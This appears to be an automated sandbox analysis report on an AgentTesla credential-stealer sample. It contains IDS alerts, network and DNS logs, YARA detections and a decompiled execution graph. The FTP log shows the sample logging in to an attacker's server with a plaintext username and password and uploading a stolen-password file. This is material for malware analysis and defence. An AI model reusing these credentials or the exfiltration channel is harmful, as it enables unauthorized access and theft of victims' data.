                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                    OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishGreat Britain
                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2025-01-11T07:48:29.677166+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.949761195.252.110.25321TCP
                                                    2025-01-11T07:48:30.260962+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.949774195.252.110.25360499TCP
                                                    2025-01-11T07:48:30.266178+01001800009Joe Security MALWARE AgentTesla - FTP Exfil Passwords1192.168.2.949774195.252.110.25360499TCP
                                                    2025-01-11T07:48:30.266178+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.949774195.252.110.25360499TCP
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 11, 2025 07:48:26.041292906 CET4974880192.168.2.9208.95.112.1
                                                    Jan 11, 2025 07:48:26.046081066 CET8049748208.95.112.1192.168.2.9
                                                    Jan 11, 2025 07:48:26.046145916 CET4974880192.168.2.9208.95.112.1
                                                    Jan 11, 2025 07:48:26.046977997 CET4974880192.168.2.9208.95.112.1
                                                    Jan 11, 2025 07:48:26.051786900 CET8049748208.95.112.1192.168.2.9
                                                    Jan 11, 2025 07:48:26.529007912 CET8049748208.95.112.1192.168.2.9
                                                    Jan 11, 2025 07:48:26.580873966 CET4974880192.168.2.9208.95.112.1
                                                    Jan 11, 2025 07:48:27.718446016 CET4976121192.168.2.9195.252.110.253
                                                    Jan 11, 2025 07:48:27.723371983 CET2149761195.252.110.253192.168.2.9
                                                    Jan 11, 2025 07:48:27.723439932 CET4976121192.168.2.9195.252.110.253
                                                    Jan 11, 2025 07:48:28.323704958 CET2149761195.252.110.253192.168.2.9
                                                    Jan 11, 2025 07:48:28.323952913 CET4976121192.168.2.9195.252.110.253
                                                    Jan 11, 2025 07:48:28.328737974 CET2149761195.252.110.253192.168.2.9
                                                    Jan 11, 2025 07:48:28.527194977 CET2149761195.252.110.253192.168.2.9
                                                    Jan 11, 2025 07:48:28.527345896 CET4976121192.168.2.9195.252.110.253
                                                    Jan 11, 2025 07:48:28.532202959 CET2149761195.252.110.253192.168.2.9
                                                    Jan 11, 2025 07:48:28.830573082 CET2149761195.252.110.253192.168.2.9
                                                    Jan 11, 2025 07:48:28.830769062 CET4976121192.168.2.9195.252.110.253
                                                    Jan 11, 2025 07:48:28.835539103 CET2149761195.252.110.253192.168.2.9
                                                    Jan 11, 2025 07:48:29.033905029 CET2149761195.252.110.253192.168.2.9
                                                    Jan 11, 2025 07:48:29.036324978 CET4976121192.168.2.9195.252.110.253
                                                    Jan 11, 2025 07:48:29.041122913 CET2149761195.252.110.253192.168.2.9
                                                    Jan 11, 2025 07:48:29.239339113 CET2149761195.252.110.253192.168.2.9
                                                    Jan 11, 2025 07:48:29.240228891 CET4976121192.168.2.9195.252.110.253
                                                    Jan 11, 2025 07:48:29.244995117 CET2149761195.252.110.253192.168.2.9
                                                    Jan 11, 2025 07:48:29.444174051 CET2149761195.252.110.253192.168.2.9
                                                    Jan 11, 2025 07:48:29.444483042 CET4976121192.168.2.9195.252.110.253
                                                    Jan 11, 2025 07:48:29.450143099 CET2149761195.252.110.253192.168.2.9
                                                    Jan 11, 2025 07:48:29.647703886 CET2149761195.252.110.253192.168.2.9
                                                    Jan 11, 2025 07:48:29.672081947 CET4977460499192.168.2.9195.252.110.253
                                                    Jan 11, 2025 07:48:29.676935911 CET6049949774195.252.110.253192.168.2.9
                                                    Jan 11, 2025 07:48:29.677002907 CET4977460499192.168.2.9195.252.110.253
                                                    Jan 11, 2025 07:48:29.677165985 CET4976121192.168.2.9195.252.110.253
                                                    Jan 11, 2025 07:48:29.682002068 CET2149761195.252.110.253192.168.2.9
                                                    Jan 11, 2025 07:48:30.260752916 CET2149761195.252.110.253192.168.2.9
                                                    Jan 11, 2025 07:48:30.260962009 CET4977460499192.168.2.9195.252.110.253
                                                    Jan 11, 2025 07:48:30.261002064 CET4977460499192.168.2.9195.252.110.253
                                                    Jan 11, 2025 07:48:30.265737057 CET6049949774195.252.110.253192.168.2.9
                                                    Jan 11, 2025 07:48:30.266120911 CET6049949774195.252.110.253192.168.2.9
                                                    Jan 11, 2025 07:48:30.266177893 CET4977460499192.168.2.9195.252.110.253
                                                    Jan 11, 2025 07:48:30.315242052 CET4976121192.168.2.9195.252.110.253
                                                    Jan 11, 2025 07:48:30.464420080 CET2149761195.252.110.253192.168.2.9
                                                    Jan 11, 2025 07:48:30.518440008 CET4976121192.168.2.9195.252.110.253
                                                    Jan 11, 2025 07:49:17.643791914 CET4974880192.168.2.9208.95.112.1
                                                    Jan 11, 2025 07:49:17.648873091 CET8049748208.95.112.1192.168.2.9
                                                    Jan 11, 2025 07:49:17.648926973 CET4974880192.168.2.9208.95.112.1
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 11, 2025 07:48:26.029300928 CET5038253192.168.2.91.1.1.1
                                                    Jan 11, 2025 07:48:26.036063910 CET53503821.1.1.1192.168.2.9
                                                    Jan 11, 2025 07:48:27.629333973 CET5599253192.168.2.91.1.1.1
                                                    Jan 11, 2025 07:48:27.717329979 CET53559921.1.1.1192.168.2.9
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Jan 11, 2025 07:48:26.029300928 CET192.168.2.91.1.1.10x794cStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                    Jan 11, 2025 07:48:27.629333973 CET192.168.2.91.1.1.10x1d4aStandard query (0)ftp.jeepcommerce.rsA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Jan 11, 2025 07:48:18.433630943 CET1.1.1.1192.168.2.90x8227No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                    Jan 11, 2025 07:48:18.433630943 CET1.1.1.1192.168.2.90x8227No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                    Jan 11, 2025 07:48:26.036063910 CET1.1.1.1192.168.2.90x794cNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                    Jan 11, 2025 07:48:27.717329979 CET1.1.1.1192.168.2.90x1d4aNo error (0)ftp.jeepcommerce.rs195.252.110.253A (IP address)IN (0x0001)false
                                                    • ip-api.com
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.949748208.95.112.1807408C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 11, 2025 07:48:26.046977997 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                    Host: ip-api.com
                                                    Connection: Keep-Alive
                                                    Jan 11, 2025 07:48:26.529007912 CET175INHTTP/1.1 200 OK
                                                    Date: Sat, 11 Jan 2025 06:48:26 GMT
                                                    Content-Type: text/plain; charset=utf-8
                                                    Content-Length: 6
                                                    Access-Control-Allow-Origin: *
                                                    X-Ttl: 60
                                                    X-Rl: 44
                                                    Data Raw: 66 61 6c 73 65 0a
                                                    Data Ascii: false


                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                    Jan 11, 2025 07:48:28.323704958 CET2149761195.252.110.253192.168.2.9220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.
                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 07:48. Server port: 21.
                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 07:48. Server port: 21.220-This is a private system - No anonymous login
                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 07:48. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 07:48. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                    Jan 11, 2025 07:48:28.323952913 CET4976121192.168.2.9195.252.110.253USER w133y@jeepcommerce.rs
                                                    Jan 11, 2025 07:48:28.527194977 CET2149761195.252.110.253192.168.2.9331 User w133y@jeepcommerce.rs OK. Password required
                                                    Jan 11, 2025 07:48:28.527345896 CET4976121192.168.2.9195.252.110.253PASS Q6]7rLSD*gU2
                                                    Jan 11, 2025 07:48:28.830573082 CET2149761195.252.110.253192.168.2.9230 OK. Current restricted directory is /
                                                    Jan 11, 2025 07:48:29.033905029 CET2149761195.252.110.253192.168.2.9504 Unknown command
                                                    Jan 11, 2025 07:48:29.036324978 CET4976121192.168.2.9195.252.110.253PWD
                                                    Jan 11, 2025 07:48:29.239339113 CET2149761195.252.110.253192.168.2.9257 "/" is your current location
                                                    Jan 11, 2025 07:48:29.240228891 CET4976121192.168.2.9195.252.110.253TYPE I
                                                    Jan 11, 2025 07:48:29.444174051 CET2149761195.252.110.253192.168.2.9200 TYPE is now 8-bit binary
                                                    Jan 11, 2025 07:48:29.444483042 CET4976121192.168.2.9195.252.110.253PASV
                                                    Jan 11, 2025 07:48:29.647703886 CET2149761195.252.110.253192.168.2.9227 Entering Passive Mode (195,252,110,253,236,83)
                                                    Jan 11, 2025 07:48:29.677165985 CET4976121192.168.2.9195.252.110.253STOR PW_user-760639_2025_01_11_01_48_26.html
                                                    Jan 11, 2025 07:48:30.260752916 CET2149761195.252.110.253192.168.2.9150 Accepted data connection
                                                    Jan 11, 2025 07:48:30.464420080 CET2149761195.252.110.253192.168.2.9226-File successfully transferred
                                                    226-File successfully transferred226 0.203 seconds (measured here), 1.53 Kbytes per second

                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:01:48:20
                                                    Start date:11/01/2025
                                                    Path:C:\Users\user\Desktop\4287eV6mBc.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\4287eV6mBc.exe"
                                                    Imagebase:0x5e0000
                                                    File size:1'072'128 bytes
                                                    MD5 hash:EDB2E2CEA8DF699849675CCF5F9B12B4
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1383949658.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.1383949658.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1383949658.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000000.00000002.1383949658.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000000.00000002.1383949658.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:01:48:24
                                                    Start date:11/01/2025
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\4287eV6mBc.exe"
                                                    Imagebase:0x990000
                                                    File size:45'984 bytes
                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3801126508.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3801126508.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3802883039.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3802883039.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3802883039.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:false

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:3.9%
                                                      Dynamic/Decrypted Code Coverage:0.4%
                                                      Signature Coverage:7%
                                                      Total number of Nodes:2000
                                                      Total number of Limit Nodes:171
                                                      execution_graph 101030 5e107d 101035 5e708b 101030->101035 101032 5e108c 101066 602d40 101032->101066 101036 5e709b __ftell_nolock 101035->101036 101069 5e7667 101036->101069 101040 5e715a 101081 60050b 101040->101081 101047 5e7667 59 API calls 101048 5e718b 101047->101048 101100 5e7d8c 101048->101100 101050 5e7194 RegOpenKeyExW 101051 61e8b1 RegQueryValueExW 101050->101051 101055 5e71b6 Mailbox 101050->101055 101052 61e943 RegCloseKey 101051->101052 101053 61e8ce 101051->101053 101052->101055 101061 61e955 _wcscat Mailbox __NMSG_WRITE 101052->101061 101104 600db6 101053->101104 101055->101032 101056 61e8e7 101114 5e522e 101056->101114 101059 61e90f 101117 5e7bcc 101059->101117 101061->101055 101062 5e79f2 59 API calls 101061->101062 101065 5e3f74 59 API calls 101061->101065 101126 5e7de1 101061->101126 101062->101061 101063 61e929 101063->101052 101065->101061 101191 602c44 101066->101191 101068 5e1096 101070 600db6 Mailbox 59 API calls 101069->101070 101071 5e7688 101070->101071 101072 600db6 Mailbox 59 API calls 101071->101072 101073 5e7151 101072->101073 101074 5e4706 101073->101074 101130 611940 101074->101130 101077 5e7de1 59 API calls 101078 5e4739 101077->101078 101132 5e4750 101078->101132 101080 5e4743 Mailbox 101080->101040 101082 611940 __ftell_nolock 101081->101082 101083 600518 GetFullPathNameW 101082->101083 101084 60053a 101083->101084 101085 5e7bcc 59 API calls 101084->101085 101086 5e7165 101085->101086 101087 5e7cab 101086->101087 101088 5e7cbf 101087->101088 101089 61ed4a 101087->101089 101154 5e7c50 101088->101154 101159 5e8029 101089->101159 101092 5e7173 101094 5e3f74 101092->101094 101093 61ed55 __NMSG_WRITE _memmove 101095 5e3f82 101094->101095 101096 5e3fa4 _memmove 101094->101096 101098 600db6 Mailbox 59 API calls 101095->101098 101097 600db6 Mailbox 59 API calls 101096->101097 101099 5e3fb8 101097->101099 101098->101096 101099->101047 101101 5e7da6 101100->101101 101103 5e7d99 101100->101103 101102 600db6 Mailbox 59 API calls 101101->101102 101102->101103 101103->101050 101107 600dbe 101104->101107 101106 600dd8 101106->101056 101107->101106 101109 600ddc std::exception::exception 101107->101109 101162 60571c 101107->101162 101179 6033a1 DecodePointer 101107->101179 101180 60859b RaiseException 101109->101180 101111 600e06 101181 6084d1 58 API calls _free 101111->101181 101113 600e18 101113->101056 101115 600db6 Mailbox 59 API calls 101114->101115 101116 5e5240 RegQueryValueExW 101115->101116 101116->101059 101116->101063 101118 5e7bd8 __NMSG_WRITE 101117->101118 101119 5e7c45 101117->101119 101121 5e7bee 101118->101121 101122 5e7c13 101118->101122 101120 5e7d2c 59 API calls 101119->101120 101125 5e7bf6 _memmove 101120->101125 101190 5e7f27 59 API calls Mailbox 101121->101190 101124 5e8029 59 API calls 101122->101124 101124->101125 101125->101063 101127 5e7df0 __NMSG_WRITE _memmove 101126->101127 101128 600db6 Mailbox 59 API calls 101127->101128 101129 5e7e2e 101128->101129 101129->101061 101131 5e4713 GetModuleFileNameW 101130->101131 101131->101077 101133 611940 __ftell_nolock 101132->101133 101134 5e475d GetFullPathNameW 101133->101134 101135 5e477c 101134->101135 101136 5e4799 101134->101136 101137 5e7bcc 59 API calls 101135->101137 101138 5e7d8c 59 API calls 101136->101138 101139 5e4788 101137->101139 101138->101139 101142 5e7726 101139->101142 101143 5e7734 101142->101143 101146 5e7d2c 101143->101146 101145 5e4794 101145->101080 101147 5e7d3a 101146->101147 101148 5e7d43 _memmove 101146->101148 101147->101148 101150 5e7e4f 101147->101150 101148->101145 101151 5e7e62 101150->101151 101153 5e7e5f _memmove 101150->101153 101152 600db6 Mailbox 59 API calls 101151->101152 101152->101153 101153->101148 101155 5e7c5f __NMSG_WRITE 101154->101155 101156 5e8029 59 API calls 101155->101156 101157 5e7c70 _memmove 101155->101157 101158 61ed07 _memmove 101156->101158 101157->101092 101160 600db6 Mailbox 59 API calls 101159->101160 101161 5e8033 101160->101161 101161->101093 101163 605797 101162->101163 101172 605728 101162->101172 101188 6033a1 DecodePointer 101163->101188 101165 60579d 101189 608b28 58 API calls __getptd_noexit 101165->101189 101168 60575b RtlAllocateHeap 101168->101172 101178 60578f 101168->101178 101170 605733 101170->101172 101182 60a16b 58 API calls __NMSG_WRITE 101170->101182 101183 60a1c8 58 API calls 5 library calls 101170->101183 101184 60309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101170->101184 101171 605783 101186 608b28 58 API calls __getptd_noexit 101171->101186 101172->101168 101172->101170 101172->101171 101176 605781 101172->101176 101185 6033a1 DecodePointer 101172->101185 101187 608b28 58 API calls __getptd_noexit 101176->101187 101178->101107 101179->101107 101180->101111 101181->101113 101182->101170 101183->101170 101185->101172 101186->101176 101187->101178 101188->101165 101189->101178 101190->101125 101192 602c50 __write 101191->101192 101199 603217 101192->101199 101198 602c77 __write 101198->101068 101216 609c0b 101199->101216 101201 602c59 101202 602c88 DecodePointer DecodePointer 101201->101202 101203 602cb5 101202->101203 101204 602c65 101202->101204 101203->101204 101262 6087a4 59 API calls __write 101203->101262 101213 602c82 101204->101213 101206 602d18 EncodePointer EncodePointer 101206->101204 101207 602cec 101207->101204 101212 602d06 EncodePointer 101207->101212 101264 608864 61 API calls 2 library calls 101207->101264 101208 602cc7 101208->101206 101208->101207 101263 608864 61 API calls 2 library calls 101208->101263 101211 602d00 101211->101204 101211->101212 101212->101206 101265 603220 101213->101265 101217 609c1c 101216->101217 101218 609c2f EnterCriticalSection 101216->101218 101223 609c93 101217->101223 101218->101201 101220 609c22 101220->101218 101247 6030b5 58 API calls 3 library calls 101220->101247 101224 609c9f __write 101223->101224 101225 609cc0 101224->101225 101226 609ca8 101224->101226 101235 609ce1 __write 101225->101235 101251 60881d 58 API calls 2 library calls 101225->101251 101248 60a16b 58 API calls __NMSG_WRITE 101226->101248 101228 609cad 101249 60a1c8 58 API calls 5 library calls 101228->101249 101231 609cd5 101233 609ceb 101231->101233 101234 609cdc 101231->101234 101232 609cb4 101250 60309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101232->101250 101238 609c0b __lock 58 API calls 101233->101238 101252 608b28 58 API calls __getptd_noexit 101234->101252 101235->101220 101240 609cf2 101238->101240 101241 609d17 101240->101241 101242 609cff 101240->101242 101254 602d55 101241->101254 101253 609e2b InitializeCriticalSectionAndSpinCount 101242->101253 101245 609d0b 101260 609d33 LeaveCriticalSection _doexit 101245->101260 101248->101228 101249->101232 101251->101231 101252->101235 101253->101245 101255 602d5e RtlFreeHeap 101254->101255 101259 602d87 _free 101254->101259 101256 602d73 101255->101256 101255->101259 101261 608b28 58 API calls __getptd_noexit 101256->101261 101258 602d79 GetLastError 101258->101259 101259->101245 101260->101235 101261->101258 101262->101208 101263->101207 101264->101211 101268 609d75 LeaveCriticalSection 101265->101268 101267 602c87 101267->101198 101268->101267 101269 607c56 101270 607c62 __write 101269->101270 101306 609e08 GetStartupInfoW 101270->101306 101272 607c67 101308 608b7c GetProcessHeap 101272->101308 101274 607cbf 101275 607cca 101274->101275 101391 607da6 58 API calls 3 library calls 101274->101391 101309 609ae6 101275->101309 101278 607cd0 101279 607cdb __RTC_Initialize 101278->101279 101392 607da6 58 API calls 3 library calls 101278->101392 101330 60d5d2 101279->101330 101282 607cea 101283 607cf6 GetCommandLineW 101282->101283 101393 607da6 58 API calls 3 library calls 101282->101393 101349 614f23 GetEnvironmentStringsW 101283->101349 101286 607cf5 101286->101283 101289 607d10 101290 607d1b 101289->101290 101394 6030b5 58 API calls 3 library calls 101289->101394 101359 614d58 101290->101359 101293 607d21 101294 607d2c 101293->101294 101395 6030b5 58 API calls 3 library calls 101293->101395 101373 6030ef 101294->101373 101297 607d34 101298 607d3f __wwincmdln 101297->101298 101396 6030b5 58 API calls 3 library calls 101297->101396 101379 5e47d0 101298->101379 101301 607d53 101302 607d62 101301->101302 101397 603358 58 API calls _doexit 101301->101397 101398 6030e0 58 API calls _doexit 101302->101398 101305 607d67 __write 101307 609e1e 101306->101307 101307->101272 101308->101274 101399 603187 36 API calls 2 library calls 101309->101399 101311 609aeb 101400 609d3c InitializeCriticalSectionAndSpinCount __mtinitlocks 101311->101400 101313 609af0 101314 609af4 101313->101314 101402 609d8a TlsAlloc 101313->101402 101401 609b5c 61 API calls 2 library calls 101314->101401 101317 609b06 101317->101314 101319 609b11 101317->101319 101318 609af9 101318->101278 101403 6087d5 101319->101403 101322 609b53 101411 609b5c 61 API calls 2 library calls 101322->101411 101325 609b32 101325->101322 101327 609b38 101325->101327 101326 609b58 101326->101278 101410 609a33 58 API calls 4 library calls 101327->101410 101329 609b40 GetCurrentThreadId 101329->101278 101331 60d5de __write 101330->101331 101332 609c0b __lock 58 API calls 101331->101332 101333 60d5e5 101332->101333 101334 6087d5 __calloc_crt 58 API calls 101333->101334 101335 60d5f6 101334->101335 101336 60d661 GetStartupInfoW 101335->101336 101337 60d601 __write @_EH4_CallFilterFunc@8 101335->101337 101343 60d676 101336->101343 101344 60d7a5 101336->101344 101337->101282 101338 60d86d 101425 60d87d LeaveCriticalSection _doexit 101338->101425 101340 6087d5 __calloc_crt 58 API calls 101340->101343 101341 60d7f2 GetStdHandle 101341->101344 101342 60d805 GetFileType 101342->101344 101343->101340 101343->101344 101345 60d6c4 101343->101345 101344->101338 101344->101341 101344->101342 101424 609e2b InitializeCriticalSectionAndSpinCount 101344->101424 101345->101344 101346 60d6f8 GetFileType 101345->101346 101423 609e2b InitializeCriticalSectionAndSpinCount 101345->101423 101346->101345 101350 614f34 101349->101350 101351 607d06 101349->101351 101426 60881d 58 API calls 2 library calls 101350->101426 101355 614b1b GetModuleFileNameW 101351->101355 101353 614f5a _memmove 101354 614f70 FreeEnvironmentStringsW 101353->101354 101354->101351 101356 614b4f _wparse_cmdline 101355->101356 101358 614b8f _wparse_cmdline 101356->101358 101427 60881d 58 API calls 2 library calls 101356->101427 101358->101289 101360 614d71 __NMSG_WRITE 101359->101360 101364 614d69 101359->101364 101361 6087d5 __calloc_crt 58 API calls 101360->101361 101369 614d9a __NMSG_WRITE 101361->101369 101362 614df1 101363 602d55 _free 58 API calls 101362->101363 101363->101364 101364->101293 101365 6087d5 __calloc_crt 58 API calls 101365->101369 101366 614e16 101368 602d55 _free 58 API calls 101366->101368 101368->101364 101369->101362 101369->101364 101369->101365 101369->101366 101370 614e2d 101369->101370 101428 614607 58 API calls __write 101369->101428 101429 608dc6 IsProcessorFeaturePresent 101370->101429 101372 614e39 101372->101293 101375 6030fb __IsNonwritableInCurrentImage 101373->101375 101452 60a4d1 101375->101452 101376 603119 __initterm_e 101377 602d40 __cinit 67 API calls 101376->101377 101378 603138 __cinit __IsNonwritableInCurrentImage 101376->101378 101377->101378 101378->101297 101380 5e4889 101379->101380 101381 5e47ea 101379->101381 101380->101301 101382 5e4824 IsThemeActive 101381->101382 101455 60336c 101382->101455 101386 5e4850 101467 5e48fd SystemParametersInfoW SystemParametersInfoW 101386->101467 101388 5e485c 101468 5e3b3a 101388->101468 101390 5e4864 SystemParametersInfoW 101390->101380 101391->101275 101392->101279 101393->101286 101397->101302 101398->101305 101399->101311 101400->101313 101401->101318 101402->101317 101404 6087dc 101403->101404 101406 608817 101404->101406 101408 6087fa 101404->101408 101412 6151f6 101404->101412 101406->101322 101409 609de6 TlsSetValue 101406->101409 101408->101404 101408->101406 101420 60a132 Sleep 101408->101420 101409->101325 101410->101329 101411->101326 101413 615201 101412->101413 101418 61521c 101412->101418 101414 61520d 101413->101414 101413->101418 101421 608b28 58 API calls __getptd_noexit 101414->101421 101416 61522c HeapAlloc 101417 615212 101416->101417 101416->101418 101417->101404 101418->101416 101418->101417 101422 6033a1 DecodePointer 101418->101422 101420->101408 101421->101417 101422->101418 101423->101345 101424->101344 101425->101337 101426->101353 101427->101358 101428->101369 101430 608dd1 101429->101430 101435 608c59 101430->101435 101434 608dec 101434->101372 101436 608c73 _memset ___raise_securityfailure 101435->101436 101437 608c93 IsDebuggerPresent 101436->101437 101443 60a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 101437->101443 101440 608d7a 101442 60a140 GetCurrentProcess TerminateProcess 101440->101442 101441 608d57 ___raise_securityfailure 101444 60c5f6 101441->101444 101442->101434 101443->101441 101445 60c600 IsProcessorFeaturePresent 101444->101445 101446 60c5fe 101444->101446 101448 61590a 101445->101448 101446->101440 101451 6158b9 5 API calls 2 library calls 101448->101451 101450 6159ed 101450->101440 101451->101450 101453 60a4d4 EncodePointer 101452->101453 101453->101453 101454 60a4ee 101453->101454 101454->101376 101456 609c0b __lock 58 API calls 101455->101456 101457 603377 DecodePointer EncodePointer 101456->101457 101520 609d75 LeaveCriticalSection 101457->101520 101459 5e4849 101460 6033d4 101459->101460 101461 6033f8 101460->101461 101462 6033de 101460->101462 101461->101386 101462->101461 101521 608b28 58 API calls __getptd_noexit 101462->101521 101464 6033e8 101522 608db6 9 API calls __write 101464->101522 101466 6033f3 101466->101386 101467->101388 101469 5e3b47 __ftell_nolock 101468->101469 101470 5e7667 59 API calls 101469->101470 101471 5e3b51 GetCurrentDirectoryW 101470->101471 101523 5e3766 101471->101523 101473 5e3b7a IsDebuggerPresent 101474 61d272 MessageBoxA 101473->101474 101475 5e3b88 101473->101475 101478 61d28c 101474->101478 101476 5e3c61 101475->101476 101475->101478 101479 5e3ba5 101475->101479 101477 5e3c68 SetCurrentDirectoryW 101476->101477 101482 5e3c75 Mailbox 101477->101482 101733 5e7213 59 API calls Mailbox 101478->101733 101604 5e7285 101479->101604 101482->101390 101483 61d29c 101488 61d2b2 SetCurrentDirectoryW 101483->101488 101485 5e3bc3 GetFullPathNameW 101486 5e7bcc 59 API calls 101485->101486 101487 5e3bfe 101486->101487 101620 5f092d 101487->101620 101488->101482 101491 5e3c1c 101492 5e3c26 101491->101492 101734 63874b AllocateAndInitializeSid CheckTokenMembership FreeSid 101491->101734 101636 5e3a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 101492->101636 101496 61d2cf 101496->101492 101498 61d2e0 101496->101498 101500 5e4706 61 API calls 101498->101500 101499 5e3c30 101501 5e3c43 101499->101501 101644 5e434a 101499->101644 101502 61d2e8 101500->101502 101655 5f09d0 101501->101655 101505 5e7de1 59 API calls 101502->101505 101507 61d2f5 101505->101507 101506 5e3c4e 101506->101476 101508 61d324 101507->101508 101509 61d2ff 101507->101509 101512 5e7cab 59 API calls 101508->101512 101511 5e7cab 59 API calls 101509->101511 101513 61d30a 101511->101513 101514 61d320 GetForegroundWindow ShellExecuteW 101512->101514 101735 5e7b2e 101513->101735 101517 61d354 Mailbox 101514->101517 101517->101476 101520->101459 101521->101464 101522->101466 101524 5e7667 59 API calls 101523->101524 101525 5e377c 101524->101525 101744 5e3d31 101525->101744 101527 5e379a 101528 5e4706 61 API calls 101527->101528 101529 5e37ae 101528->101529 101530 5e7de1 59 API calls 101529->101530 101531 5e37bb 101530->101531 101758 5e4ddd 101531->101758 101534 61d173 101829 64955b 101534->101829 101535 5e37dc Mailbox 101782 5e8047 101535->101782 101539 61d192 101540 602d55 _free 58 API calls 101539->101540 101543 61d19f 101540->101543 101545 5e4e4a 84 API calls 101543->101545 101547 61d1a8 101545->101547 101551 5e3ed0 59 API calls 101547->101551 101548 5e7de1 59 API calls 101549 5e3808 101548->101549 